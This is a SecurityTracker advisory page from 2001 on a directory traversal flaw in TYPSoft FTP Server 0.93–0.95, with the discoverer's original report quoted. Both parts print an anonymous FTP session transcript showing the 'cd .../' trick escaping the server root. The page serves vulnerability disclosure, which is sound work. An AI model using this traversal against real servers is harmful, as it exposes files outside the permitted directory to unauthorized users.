SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FTP (Generic) Vendors:   TYPSoft
TYPSoft FTP Server Lets Remote Users Obtain Files From Outside of the FTP Server's Document Directory
SecurityTracker Alert ID:  1001518
SecurityTracker URL:  http://securitytracker.com/id/1001518
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 11 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): v0.93 - v0.95; possibly earlier versions
Description:   TYPSoft's FTP server reportedly contains a vulnerability that allows a remote user to obtain files from the server located outside of the FTP server's root document directory.

A remote user can use "..." characters to trigger the vulnerability and break out of the FTP root document directory.

A transcript of a vulnerable session follows:

>ftp 127.0.0.1
220 TYPsoft FTP server 0.95 ready...
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp>pwd
257 " / " is current directory.
ftp>cd ../
501 CWD failed. Cannot accept relative path using dot notation.
ftp> cd .../
250 CWD command successful. "/.../" is current directory.
ftp>dir
drw-rw-rw- 1 ftp ftp 0 May 01 19:44
FTP Server
drw-rw-rw- 1 ftp ftp 0 May 01 19:47
temp
drw-rw-rw- 1 ftp ftp 0 Dec 24 2000
windows
.....
226 Transfer complete.
ftp>

The vendor was reportedly contacted.

Impact:   A remote user with access to the server can obtain files from the server located outside of the FTP server's root document directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  typsoft.n3.net (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Vulnerabilty in TYPsoft FTP server


~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilty in TYPsoft FTP server v0.95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:
TYPsoft FTP Server  is a freeware ftp server available from
http://typsoft.n3.net .

Affected systems:
FTP server v0.95 - 0.93  and probably prior versions for
Windows 95/98/NT/2000/ME

Description:
An attacker with anonymous access to the ftp server can break out of the ftp
root using the dot vulnerability.
This is the problem:

>ftp 127.0.0.1
220 TYPsoft  FTP server 0.95 ready...
User (127.0.0.1:(none)): anonymous
331  Password required for anonymous.
Password:
230 User anonymous logged in.
ftp>pwd
257  " / "  is current directory.
ftp>cd ../
501 CWD failed. Cannot  accept relative path using dot  notation.
ftp> cd .../
250 CWD command successful. "/.../" is current directory.
ftp>dir
drw-rw-rw-             1 ftp           ftp                 0 May   01 19:44
FTP Server
drw-rw-rw-             1 ftp           ftp                 0 May   01 19:47
temp
drw-rw-rw-             1 ftp           ftp                 0 Dec    24 2000
windows
.....
226 Transfer complete.
ftp>

Vendor status:
TYPsoft staff was contacted on Tuesday 1 May,2001 and no reply was received.

SosPiro
sospiro@freemail.it

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC